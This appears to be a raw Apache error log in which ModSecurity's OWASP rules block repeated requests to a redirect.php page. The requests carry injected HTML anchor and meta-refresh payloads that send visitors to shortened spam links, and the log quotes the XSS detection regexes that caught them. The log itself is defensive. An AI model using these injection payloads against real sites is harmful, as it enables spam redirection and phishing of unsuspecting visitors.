[Mon May 11 16:58:53.022715 2026] [security2:error] [pid 1411201:tid 1411249] [client 194.233.64.127:60203] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/yegn4o>kampus swasta terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/yegn4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurfy_GXSWIKeli0v-bAAAAIM"]
[Mon May 11 16:58:53.023406 2026] [security2:error] [pid 1411201:tid 1411249] [client 194.233.64.127:60203] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurfy_GXSWIKeli0v-bAAAAIM"]
[Mon May 11 16:58:53.023553 2026] [security2:error] [pid 1411201:tid 1411249] [client 194.233.64.127:60203] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurfy_GXSWIKeli0v-bAAAAIM"]
[Mon May 11 16:58:53.024332 2026] [security2:error] [pid 1411201:tid 1411249] [client 194.233.64.127:60203] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurfy_GXSWIKeli0v-bAAAAIM"]
[Mon May 11 16:58:53.025056 2026] [security2:error] [pid 1411201:tid 1411249] [client 194.233.64.127:60203] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurfy_GXSWIKeli0v-bAAAAIM"]
[Mon May 11 16:58:53.025434 2026] [security2:error] [pid 1411201:tid 1411249] [client 194.233.64.127:60203] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurfy_GXSWIKeli0v-bAAAAIM"]
[Mon May 11 16:58:53.025699 2026] [security2:error] [pid 1411201:tid 1411249] [client 194.233.64.127:60203] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurfy_GXSWIKeli0v-bAAAAIM"]
[Mon May 11 16:58:53.709537 2026] [security2:error] [pid 1411055:tid 1411067] [client 194.233.64.127:60259] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/yegn4o>kampus swasta terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/yegn4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurUWKUxpmnkK7zHyJ9gAAAQo"]
[Mon May 11 16:58:53.709964 2026] [security2:error] [pid 1411055:tid 1411067] [client 194.233.64.127:60259] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurUWKUxpmnkK7zHyJ9gAAAQo"]
[Mon May 11 16:58:53.710110 2026] [security2:error] [pid 1411055:tid 1411067] [client 194.233.64.127:60259] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurUWKUxpmnkK7zHyJ9gAAAQo"]
[Mon May 11 16:58:53.710225 2026] [security2:error] [pid 1411055:tid 1411067] [client 194.233.64.127:60259] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurUWKUxpmnkK7zHyJ9gAAAQo"]
[Mon May 11 16:58:53.710409 2026] [security2:error] [pid 1411055:tid 1411067] [client 194.233.64.127:60259] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/yEGN4o>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/yEGN4o />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurUWKUxpmnkK7zHyJ9gAAAQo"]
[Mon May 11 16:58:53.710820 2026] [security2:error] [pid 1411055:tid 1411067] [client 194.233.64.127:60259] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurUWKUxpmnkK7zHyJ9gAAAQo"]
[Mon May 11 16:58:53.711116 2026] [security2:error] [pid 1411055:tid 1411067] [client 194.233.64.127:60259] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHurUWKUxpmnkK7zHyJ9gAAAQo"]
[Mon May 11 16:59:26.727353 2026] [security2:error] [pid 1411099:tid 1411104] [client 43.157.175.122:34954] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.fr"] [uri "/"] [unique_id "agHuzg-Qm4vhlWBPlMjFdQAAAAM"]
[Mon May 11 17:00:00.730772 2026] [security2:error] [pid 1416109:tid 1416150] [client 43.157.50.58:36128] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHu8FV4kyjgo4bQBUhhtQAAANQ"]
[Mon May 11 17:00:27.033044 2026] [authz_core:error] [pid 1412074:tid 1412097] [client 47.128.23.51:39602] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/rest-api/search/error_log
[Mon May 11 17:00:47.765544 2026] [authz_core:error] [pid 1416109:tid 1416143] [client 47.128.58.252:36070] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/lib/error_log
[Mon May 11 17:00:57.782851 2026] [proxy_fcgi:error] [pid 1411099:tid 1411120] [client 172.86.89.164:60470] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:01:06.388375 2026] [security2:error] [pid 1411201:tid 1411265] [client 43.131.39.179:35654] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.fr"] [uri "/"] [unique_id "agHvMvy_GXSWIKeli0v_UwAAAJQ"]
[Mon May 11 17:01:10.315672 2026] [proxy_fcgi:error] [pid 1411099:tid 1411121] [client 94.46.170.157:37306] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:01:36.743685 2026] [ssl:error] [pid 1411099:tid 1411113] (EAI 2)Name or service not known: [client 47.128.30.85:37878] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:01:36.744016 2026] [ssl:error] [pid 1411099:tid 1411113] AH01941: stapling_renew_response: responder error
[Mon May 11 17:02:58.800033 2026] [autoindex:error] [pid 1411055:tid 1411076] [client 3.249.20.197:46366] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:03:11.319451 2026] [security2:error] [pid 1411099:tid 1411102] [client 194.233.64.127:60387] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://images.google.com.np/url?q=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrw-Qm4vhlWBPlMjGzAAAAAE"]
[Mon May 11 17:03:11.322563 2026] [security2:error] [pid 1411099:tid 1411102] [client 194.233.64.127:60387] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 /> found within ARGS:url: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh conten..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrw-Qm4vhlWBPlMjGzAAAAAE"]
[Mon May 11 17:03:11.323588 2026] [security2:error] [pid 1411099:tid 1411102] [client 194.233.64.127:60387] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 /> found within ARGS:url: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrw-Qm4vhlWBPlMjGzAAAAAE"]
[Mon May 11 17:03:11.323869 2026] [security2:error] [pid 1411099:tid 1411102] [client 194.233.64.127:60387] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrw-Qm4vhlWBPlMjGzAAAAAE"]
[Mon May 11 17:03:11.324774 2026] [security2:error] [pid 1411099:tid 1411102] [client 194.233.64.127:60387] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSenso [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrw-Qm4vhlWBPlMjGzAAAAAE"]
[Mon May 11 17:03:11.325220 2026] [security2:error] [pid 1411099:tid 1411102] [client 194.233.64.127:60387] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrw-Qm4vhlWBPlMjGzAAAAAE"]
